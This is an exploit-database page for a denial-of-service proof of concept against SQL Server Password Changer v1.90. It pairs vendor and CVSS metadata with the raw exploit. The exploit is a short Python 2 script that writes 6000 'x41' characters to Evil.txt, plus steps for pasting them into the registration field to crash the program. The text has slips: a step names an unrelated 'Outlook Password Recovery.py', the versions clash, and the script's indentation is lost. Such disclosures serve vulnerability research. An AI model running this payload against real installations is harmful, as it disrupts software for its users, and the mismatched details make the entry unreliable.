SQL Server Password Changer v1.90 Denial of Service Exploit

vendor:

SQL Server Password Changer

by:

Velayutham Selvaraj & Praveen Thiyagarayam (TwinTech Solutions)

7.8

CVSS

HIGH

Denial of Service

400

CWE

Product Name: SQL Server Password Changer

Affected Version From: v1.90

Affected Version To: v2.10

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 8 x64, Windows 7 x64

2019

SQL Server Password Changer v1.90 Denial of Service Exploit

A denial of service vulnerability exists in SQL Server Password Changer v1.90 when a maliciously crafted User Name and Registration Code is entered into the application, resulting in a crash. An attacker can exploit this vulnerability by running a python code to create a file containing 6000 bytes of 'x41' characters, copying the content of the file to the clipboard, opening SQL Server Password Changer and clicking 'EnterKey', pasting the content of the file into the 'User Name and Registration Code' field, and clicking 'OK' to trigger the crash.

Mitigation:

The vendor has released a patch to address this vulnerability.

Source

Exploit-DB raw data:

#Exploit Title: SQL Server Password Changer v1.90 Denial of Service Exploit
# Date: 29.08.2019
# Vendor Homepage:https://www.top-password.com/
# Exploit Author: Velayutham Selvaraj & Praveen Thiyagarayam (TwinTech Solutions)
# Tested Version: v2.10
# Tested on: Windows 8 x64
# Windows 7 x64


# 1.- Run python code :Outlook Password Recovery.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open SQL Server Password Changer and Click 'EnterKey'
# 4.- Paste the content of EVIL.txt into the Field: 'User Name and Registration Code'
# 5.- Click 'OK' and you will see a crash.

#!/usr/bin/env python
buffer = "x41" * 6000

try:
f=open("Evil.txt","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except:
print "File cannot be created"